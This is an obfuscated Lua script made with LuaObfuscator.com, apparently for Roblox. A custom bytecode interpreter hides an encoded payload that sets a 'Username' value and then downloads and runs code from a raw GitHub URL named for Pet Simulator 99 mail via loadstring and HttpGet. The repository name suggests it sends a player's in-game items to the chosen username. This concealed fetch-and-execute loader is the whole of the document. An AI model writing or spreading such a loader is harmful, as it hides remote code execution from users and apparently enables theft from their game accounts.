--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==((929 -(214 + 713)) -1)) then return (v34 * (493 -237)) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + (621 -(555 + 17 + 47)) );v19=v19 + (933 -(857 + 74)) ;v32=569 -(58 + 309 + 201) ;end end end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=878 -(282 + 595) ;local v38=(v21(v36,1,1657 -(1523 + 114) ) * ((2 + 0)^(45 -13))) + v35 ;local v39=v21(v36,1086 -(68 + 997) ,(2253 -(802 + 150)) -(167 + 59 + 1044) );local v40=((v21(v36,139 -107 )==1) and  -(118 -(32 + 85))) or (1 + 0) ;if (v39==((0 -0) + 0)) then if (v38==(957 -(892 + 65))) then return v40 * (0 -0) ;else v39=1 -0 ;v37=0 -0 ;end elseif (v39==2047) then return ((v38==(350 -(87 + 263))) and (v40 * (1/0))) or (v40 * NaN) ;end return v8(v40,v39-((876 + 327) -(67 + 113)) ) * (v37 + (v38/((2 + 0)^(127 -(298 -223))))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==(0 -0)) then return "";end end v42=v3(v16,v19,(v19 + v41) -(1 + 0) );v19=v19 + v41 ;local v43={};for v69=1, #v42 do v43[v69]=v2(v1(v3(v42,v69,v69)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v44==(0 + 0)) then v45=202 -(14 + 188) ;v46=nil;v44=1 + 0 ;end if (v44~=(679 -(534 + 141))) then else while true do if (3~=v45) then else v52=nil;while true do local v100=0 -0 ;local v101;while true do if (v100==(0 + 0)) then v101=0 + 0 ;while true do if (v101~=0) then else if (v46==(3 + 0)) then local v143=0 -0 ;local v144;local v145;while true do if (0==v143) then v144=0;v145=nil;v143=1;end if (v143==(1 -0)) then while true do if (v144~=(0 -0)) then else v145=0 + 0 ;while true do if ((0 + 0)==v145) then for v171=397 -(115 + 281) ,v24() do v48[v171-(2 -1) ]=v29();end return v50;end end break;end end break;end end end if ((2 + 0)~=v46) then else local v146=0;local v147;while true do if (v146==(0 -0)) then v147=0 -0 ;while true do if (0==v147) then local v163=867 -(550 + 317) ;local v164;while true do if (v163==0) then v164=0;while true do if (v164~=(0 -0)) then else local v173=0 -0 ;while true do if (v173==(2 -1)) then v164=286 -(134 + 151) ;break;end if (v173~=(1665 -(970 + 695))) then else for v182=1 -0 ,v51 do local v183=1990 -(582 + 1408) ;local v184;local v185;while true do if (0==v183) then v184=v22();v185=nil;v183=1;end if (v183~=(3 -2)) then else if (v184==1) then v185=v22()~=0 ;elseif (v184==(2 -0)) then v185=v25();elseif (v184==(11 -8)) then v185=v26();end v52[v182]=v185;break;end end end v50[1827 -(1195 + 629) ]=v22();v173=1;end end end if (v164==(1 -0)) then v147=1;break;end end break;end end end if (v147~=(242 -(187 + 54))) then else for v167=781 -(162 + 618) ,v24() do local v168=0 + 0 ;local v169;local v170;while true do if (v168==0) then v169=0;v170=nil;v168=1 + 0 ;end if (v168~=(1 + 0)) then else while true do if ((0 -0)==v169) then v170=v22();if (v21(v170,1 -0 ,1 + 0 )==0) then local v176=1636 -(1373 + 263) ;local v177;local v178;local v179;local v180;local v181;while true do if (v176==(1002 -(451 + 549))) then v181=nil;while true do if (v177==(4 -2)) then while true do if (v178==1) then local v188=0;while true do if (v188==(0 + 0)) then v181={v23(),v23(),nil,nil};if (v179==(0 -0)) then local v196=1121 -(118 + 1003) ;local v197;local v198;while true do if ((0 -0)==v196) then v197=377 -(142 + 235) ;v198=nil;v196=1;end if (v196==(1 + 0)) then while true do if (v197~=(0 -0)) then else v198=341 -(218 + 123) ;while true do if (v198==0) then v181[3]=v23();v181[1585 -(1535 + 46) ]=v23();break;end end break;end end break;end end elseif (v179==1) then v181[3 + 0 ]=v24();elseif (v179==2) then v181[1 + 2 ]=v24() -((562 -(306 + 254))^(1 + 15)) ;elseif (v179~=3) then else local v205=0 -0 ;while true do if (v205==0) then v181[3 + 0 ]=v24() -((2 + 0)^(30 -14)) ;v181[1471 -(899 + 568) ]=v23();break;end end end v188=1 + 0 ;end if (1==v188) then v178=2 + 0 ;break;end end end if (v178==2) then local v189=0;while true do if (v189==(0 -0)) then local v194=0 + 0 ;while true do if (v194~=(2 -1)) then else v189=1;break;end if ((603 -(268 + 335))==v194) then if (v21(v180,291 -(60 + 230) ,1)==(573 -(426 + 146))) then v181[1 + 1 ]=v52[v181[9 -7 ]];end if (v21(v180,1458 -(282 + 1174) ,2)==(812 -(569 + 242))) then v181[8 -5 ]=v52[v181[1 + 2 ]];end v194=1025 -(706 + 318) ;end end end if (v189==(1252 -(721 + 530))) then v178=3 + 0 ;break;end end end if (v178==(2 + 1)) then if (v21(v180,6 -3 ,1274 -(945 + 326) )==(732 -(476 + 255))) then v181[1134 -(369 + 761) ]=v52[v181[9 -5 ]];end v47[v167]=v181;break;end if (v178~=0) then else local v191=0;while true do if ((0 + 0)==v191) then local v195=700 -(271 + 429) ;while true do if (v195==1) then v191=1 -0 ;break;end if ((0 -0)==v195) then v179=v21(v170,2,3);v180=v21(v170,4 + 0 ,1506 -(1408 + 92) );v195=1087 -(461 + 625) ;end end end if (v191==(1 -0)) then v178=1;break;end end end end break;end if (v177==(1288 -(993 + 295))) then v178=0;v179=nil;v177=1 + 0 ;end if ((1172 -(418 + 753))==v177) then local v187=0;while true do if (v187~=(1 + 0)) then else v177=218 -(42 + 174) ;break;end if (v187~=(0 + 0)) then else v180=nil;v181=nil;v187=1;end end end end break;end if (v176==1) then v179=nil;v180=nil;v176=2 + 0 ;end if (v176==(0 + 0)) then v177=1504 -(363 + 1141) ;v178=nil;v176=1 + 0 ;end end end break;end end break;end end end v46=1583 -(1183 + 397) ;break;end end break;end end end v101=530 -(406 + 123) ;end if (v101~=(1770 -(1749 + 20))) then else if (v46~=(1 + 0)) then else local v148=1322 -(1249 + 73) ;local v149;while true do if (v148~=(0 + 0)) then else v149=0 + 0 ;while true do if (v149==(1146 -(466 + 679))) then v52={};v46=2;break;end if (v149==(0 + 0)) then v50={v47,v48,nil,v49};v51=v24();v149=1 + 0 ;end end break;end end end if (v46~=0) then else local v150=0;local v151;while true do if (v150~=0) then else v151=0 -0 ;while true do if (v151==0) then local v165=0;local v166;while true do if (v165==0) then v166=0 + 0 ;while true do if (v166==(1 + 0)) then v151=857 -(564 + 292) ;break;end if (0==v166) then local v174=0 -0 ;while true do if (v174~=0) then else v47={};v48={};v174=2 -1 ;end if (v174~=1) then else v166=305 -(244 + 60) ;break;end end end end break;end end end if (v151==(2 -1)) then v49={};v46=477 -(41 + 435) ;break;end end break;end end end break;end end break;end end end break;end if (1~=v45) then else local v97=1001 -(938 + 63) ;while true do if (v97~=(1 + 0)) then else v45=1127 -(936 + 189) ;break;end if (v97==(0 -0)) then local v106=0 + 0 ;while true do if (v106==(114 -(4 + 110))) then v48=nil;v49=nil;v106=585 -(57 + 527) ;end if (v106==(1428 -(41 + 1386))) then v97=104 -(17 + 86) ;break;end end end end end if (0==v45) then local v98=0 + 0 ;while true do if (v98==1) then v45=268 -(176 + 91) ;break;end if (v98==(0 -0)) then v46=0;v47=nil;v98=1 -0 ;end end end if ((1094 -(975 + 117))~=v45) then else local v99=0;while true do if ((0 -0)==v99) then v50=nil;v51=nil;v99=1;end if ((167 -(122 + 44))==v99) then v45=5 -2 ;break;end end end end break;end if (v44~=(3 -2)) then else v47=nil;v48=nil;v44=6 -4 ;end if (v44==2) then v49=nil;v50=nil;v44=9 -6 ;end if (v44~=(7 -4)) then else local v75=0 + 0 ;while true do if (v75==(0 + 0)) then v51=nil;v52=nil;v75=1;end if (v75==1) then v44=4;break;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then v20=v0(v3(v53,1,1));return "";else local v71=v2(v0(v53,16));if v20 then local v79=v5(v71,v20);v20=nil;return v79;else return v71;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54=0;local v55;local v56;local v57;local v58;while true do if (v54==(1 -0)) then return (v58 * 16777216) + (v57 * (151085 -85549)) + (v56 * ((711 -(602 + 9)) + (1345 -(449 + 740)))) + v55 ;end if (0==v54) then v55,v56,v57,v58=v1(v16,v19,v19 + (5 -2) );v19=v19 + (10 -6) ;v54=1228 -(322 + 905) ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v80=v63;local v81=v64;local v82=v65;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=4) then if (v93<=1) then if (v93>0) then do return;end else v61[v92[3]]=v90[v92[2]];end elseif (v93<=2) then v90[v92[2]]();elseif (v93==3) then local v111=v92[2];local v112,v113=v83(v90[v111](v13(v90,v111 + 1 ,v92[3])));v85=(v113 + v111) -1 ;local v114=0;for v138=v111,v85 do v114=v114 + 1 ;v90[v138]=v112[v114];end else v84=v92[3];end elseif (v93<=7) then if (v93<=5) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93==6) then local v117;local v118,v119;local v120;local v121;v61[v92[3]]=v90[v92[2]];v84=v84 + 1 ;v92=v80[v84];if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v61;else v90[v92[2]]=v61[v92[3]];end v84=v84 + 1 ;v92=v80[v84];if ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v61;else v90[v92[2]]=v61[v92[3]];end v84=v84 + 1 ;v92=v80[v84];v121=v92[2];v120=v90[v92[3]];v90[v121 + 1 ]=v120;v90[v121]=v120[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v121=v92[2];v118,v119=v83(v90[v121](v13(v90,v121 + 1 ,v92[3])));v85=(v119 + v121) -1 ;v117=0;for v141=v121,v85 do local v142=0;while true do if (v142==0) then v117=v117 + 1 ;v90[v141]=v118[v117];break;end end end v84=v84 + 1 ;v92=v80[v84];v121=v92[2];v90[v121]=v90[v121](v13(v90,v121 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v84=v92[3];else local v131=v92[2];v90[v131]=v90[v131](v13(v90,v131 + 1 ,v85));end elseif (v93<=8) then v90[v92[2]]=v92[3];elseif (v93>9) then local v133=v92[2];local v134=v90[v92[3]];v90[v133 + 1 ]=v134;v90[v133]=v134[v92[4]];elseif ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v61;else v90[v92[2]]=v61[v92[3]];end v84=v84 + 1 ;end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v72=872 -((2031 -(902 + 303)) + (100 -54)) ;local v73;while true do if (v72==(947 -(245 + 702))) then v73=(v66/((6 -4)^(v67-(1 + 0))))%((1900 -(260 + 1638))^(((v68-(441 -((919 -537) + 58))) -(v67-(3 -2))) + 1 + 0)) ;return v73-(v73%(1 + 0)) ;end end else local v74=2^(v67-(1 -0)) ;return (((v66%(v74 + v74))>=v74) and 1) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003083O00557365726E616D65030D3O00557365726E616D652048657265030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012083O00013O0026053O000100010001002O043O00010001001208000100033O001206000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E0001002O043O000100012O00013O00017O00",v9(),...);
